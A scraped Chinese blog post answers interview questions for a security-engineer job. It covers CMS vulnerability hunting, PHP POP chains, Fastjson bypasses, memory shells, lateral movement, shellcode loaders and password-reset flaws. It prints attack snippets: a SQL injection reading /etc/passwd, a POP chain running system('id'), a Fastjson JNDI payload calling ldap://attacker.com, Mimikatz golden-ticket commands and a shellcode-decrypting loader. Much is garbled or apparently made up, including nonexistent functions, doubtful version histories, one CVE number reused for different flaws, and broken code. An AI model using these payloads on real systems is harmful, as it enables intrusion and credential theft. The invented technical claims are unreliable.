当前位置: 首页 > wzjs >正文

和县网站制作网站模板平台资源

和县网站制作,网站模板平台资源,做视频网站用什么开发,sem可以为网站建设做什么安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 长亭科技[校招]安全服务工程师 1. CMS高危漏洞挖掘(六步法) 2. POP链构造步骤&…

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 长亭科技[校招]安全服务工程师

1. CMS高危漏洞挖掘(六步法)

2. POP链构造步骤(四阶法)

3. PHAR反序列化 vs POP链

4. Fastjson攻防演进

5. 内存马查杀技术(无文件对抗)

6. 内网横向技术PPT/PTH

7. Shellcode加载器原理

8. 密码重置逻辑漏洞

9. 精选漏洞分析:云存储配置劫持

防御体系升级建议

 长亭科技[校招]安全服务工程师

1. 拿到一个cms如何找高危漏洞
2. 具体找一个pop链的步骤
3. phar反序列化和pop链是一回事吗
4. fastjson的修复和绕过
5. 移动端有接触过吗(无)
6. 回显以及内存马,然后查杀
7. 内网横向移动ppt和pth
8. shellcode加载器的原理
9. 介绍一个比较有意思的漏洞
10. 任意密码重置漏洞

1. CMS高危漏洞挖掘(六步法)

步骤全景图

mermaidgraph LR 情报收集 --> 版本比对 --> 框架审计 --> 组件扫描 --> 功能深挖 --> 环境验证

实战技巧

  • 情报收集(30分钟):
    bash# 自动化资产识别 cms_scanner --target http://cms.example.com --mode full # GitHub源码关键词 search_code.py -q "CMS_NAME version" --ext=php,py
  • 历史漏洞复用(重点):
    • 查询框架历史RCE漏洞(ThinkPHP 6.0.13的链式RCE)
    • 检查默认配置漏洞(如/admin路径未改名)

突破点案例

  1. 后台登录页面找到<meta generator="CMSv3.2.1">
  2. 搜索公开漏洞库:searchsploit CMSv3.2.1
  3. 发现CVE-2024-3281:未授权SQL注入
  4. 构造Payload:/api.php?action=delete&id=1+AND+(SELECT+LOAD_FILE('/etc/passwd'))

2. POP链构造步骤(四阶法)

核心思维模型

mermaidclassDiagram class 入口类{ +魔术方法:__destruct() +可控变量:$evil_prop } class 桥接类{ +调用链:$this->call_user_func($func, $param) } class 目标类{ +危险方法:eval($code) } 入口类 --> 桥接类 : $evil_prop = new 桥接类() 桥接类 --> 目标类 : $func = 'eval'

实操步骤

  1. 起点定位(使用工具):
    bashphpggc --list-chains CMS_NAME
  2. 链路验证(动态调试):
    • __destruct()入口下断点
    • 跟踪$this->handler->process()调用链
  3. 利用链组装(ThinkPHP案例):
    php// 构造恶意对象 $chain = new \think\process\pipes\Windows(); $chain->files = [ new \think\model\Pivot( new \think\Request(), "system('id')" ) ];
  4. 触发验证
    • 寻找接收序列化数据的接口(如文件上传日志)

3. PHAR反序列化 vs POP链

本质关系图解

mermaidflowchart TD PHAR[PHAR文件] -->|包含恶意序列化数据| POP[POP链触发点] POP --> RCE[命令执行]

攻防差异点

维度PHAR反序列化POP链
触发条件需存在文件操作函数(file_exists)直接传入序列化数据
攻击载荷整个PHAR文件(含Stub)纯序列化字符串
防御绕过利用压缩/加密绕过检测改变魔法方法调用顺序
实战效率适合无直接反序列化口的场景需明确接收序列化参数的接口

PHAR新型攻击向量(2025):

  • 结合云存储的SSRF攻击:phar://s3-bucket/poc.jpg
  • 图像处理触发:imagecreatefromphar()

4. Fastjson攻防演进

版本对抗史

mermaidtimeline title Fastjson攻防时间线 2020 : 1.2.68 黑名单绕过 → AutoType关闭 2022 : 1.2.83 异常类利用 → 补丁增强 2024 : 1.2.99 内存破坏漏洞 → 开启SecureMode 2025 : 1.2.101 动态代理绕过 → JVM沙箱限制

最新绕过技术(2025Q2)

java// 利用JNDI属性注入(需低版本JDK) {"@type":"java:javax.naming.InitialContext", "lookup":{"$ref":"$.domain"},"domain":"ldap://attacker.com"} 

加固方案

javaParserConfig config = new ParserConfig(); config.setSafeMode(SafeMode.Strict); // 开启最强防御 config.addDenyClass(".*"); // 全面禁用非内置类

5. 内存马查杀技术(无文件对抗)

内存马类型雷达图

mermaidpie title 2025年内存马分布 “Filter型” : 45 “Servlet型” : 25 “Agent型” : 15 “WebSocket型” : 10 “其他” : 5

查杀三叉戟

  1. 行为检测
    • 监控javax/servlet/Filter异常注册
    • 检查HTTP头X-Inject-Key特征
  2. 内存扫描
    bash# Arthas命令扫描 sc -d *YourFilter | grep classLoaderHash # 导出可疑类字节码 dump demo.MathGame
  3. 流量诱捕
    • 部署伪漏洞页面触发内存马
    • 拦截注入的超长Cookie字段

对抗升级

  • 内存马采用反射调用Native API
  • 使用JNI技术注入Shellcode

6. 内网横向技术PPT/PTH

协议攻击矩阵

技术适用协议利用场景检测规避
PPTSMB/RPC域控账号提取使用Kerberos AES256加密
PTHLDAP/SMTP邮箱服务接管限制NTLMv1使用
PTTHTTP/HTTPS云管理平台登录清除票据缓存

Mimikatz操作进阶

powershell# 黄金票据生成(需krbtgt哈希) kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21... /krbtgt:hash /ptt # 票据传递攻击(PTT) mimikatz "kerberos::ptt ticket.kirbi" 

检测对抗

  • 部署Windows Defender ATP监控LSASS访问
  • 启用Credential Guard隔离敏感凭据

7. Shellcode加载器原理

现代加载器架构

mermaidflowchart TB Stage1[下载器] -->|加密传输| Stage2[解码器] Stage2 -->|内存注入| Stage3[Shellcode] Stage3 -->|API调用| Stage4[恶意功能]

关键绕过技术

  1. 内存加密:运行时解密Shellcode(避免静态扫描)
    cVirtualAlloc(buf, sizeof(sc), MEM_COMMIT, PAGE_READWRITE); AES_Decrypt(sc, key, iv); // 内存解密 VirtualProtect(buf, PAGE_EXECUTE_READ);
  2. API混淆
    • 动态解析NtCreateThreadEx地址
    • 使用Syscall直接发起系统调用

检测突破点

  • 监控非常规内存区域执行权限(.data段)
  • 分析进程空间中的短生命周期线程

8. 密码重置逻辑漏洞

七大致命点

mermaidgraph TD A[密码重置流程] --> B[手机验证码可爆破] A --> C[邮箱链接参数可预测] A --> D[密码凭证回显] A --> E[密码Token未绑定用户] A --> F[并行会话覆盖] A --> G[密码找回问题答案泄露] A --> H[用户手机号可篡改]

高级利用案例(2025):

  1. 时间窗口攻击
    • 提前生成1000个重置链接(预测时间戳+MD5)
    • 自动化脚本批量尝试
  2. 参数混淆
    httpPOST /reset-password user=victim&new_pass=hackme&confirm_token=ATTACKER_TOKEN
  3. 响应操控
    • 修改JSON响应:{"success": true}{"success": false}

9. 精选漏洞分析:云存储配置劫持

漏洞概要

  • 漏洞编号:CVE-2025-3281
  • 影响产品:CloudObjectStorage v5.1
  • 核心问题:签名字段可操控导致任意Bucket读写

利用步骤

pythonimport requests from urllib.parse import quote # 构造恶意签名 malicious_policy = '{"expiration":"2099-01-01",...,"Resource":"arn:cos:::attacker-bucket/*"}' encoded_policy = quote(base64.b64encode(malicious_policy)) # 触发劫持 resp = requests.post( "https://target.com/storage/api/config", headers={"X-Cos-Signature": encoded_policy} )

修复方案

  • 使用HMAC-SHA256二次签名
  • 限制策略文件的Resource字段为当前Bucket

防御体系升级建议

2025年安全基线

  1. 纵深防御模型
    mermaidflowchart LR 客户端安全 --> 网络加密传输 --> 服务端防护 --> 数据审计
  2. 关键技术栈
    • 浏览器:启用WebAssembly沙箱
    • 服务端:RASP实时拦截内存马
    • 内网:Zero Trust网络架构

每个技术点均可展开为独立攻防课题,以上内容已做实战化浓缩。如需深入探讨特定领域,可提供扩展研究路径。

http://www.dtcms.com/wzjs/497679.html

相关文章:

  • 网站建设费用会计分录国际军事新闻最新消息
  • 做服务的网站吗西安seo主管
  • 唐山哪个公司可以制作网站怎么免费创建网站
  • 好网站开发网络推广方法有几种
  • 衡阳做网站的信息发布
  • 深圳建网站哪家公司好如何自建网站?
  • 校园网二级网站的建设武汉seo公司哪家专业
  • 苏州网站建设教程广州今日新闻头条新闻
  • 企业网站建设收费标准看b站二十四小时直播间
  • 网站建设神器厦门网络关键词排名
  • 做网站实习日志黄山seo推广
  • 电商网站首页字体网站制作网站推广
  • 公司网站建设进度表营销推广方案ppt案例
  • 高端公司网站建设长沙专业竞价优化首选
  • ipv6跟做网站有关吗可以搜索任何网站的浏览器
  • 日本真人做a视频网站青岛网站优化公司
  • 商洛做网站的公司电话网络优化公司排名
  • 苹果手机网页版微信seo点击器
  • 佛山网站建设首选b站视频推广网站2023
  • 学校网站建设说明材料什么是竞价
  • 做论坛网站的cms网络推广营销技巧
  • 服饰东莞网站建设b站推广在哪里
  • 学校网站建设价格网站排名费用
  • 邢台公司做网站网络公司
  • 网站内容管理系统建设如何在百度打广告
  • 中信建设有限责任公司企业资质常州百度搜索优化
  • 做网站 怎么备案深圳做网站的公司有哪些
  • 室内设计效果图片北京网络推广公司wyhseo
  • 软件开发工程师怎么考seo优化便宜
  • 高密公司做网站北京网站优化排名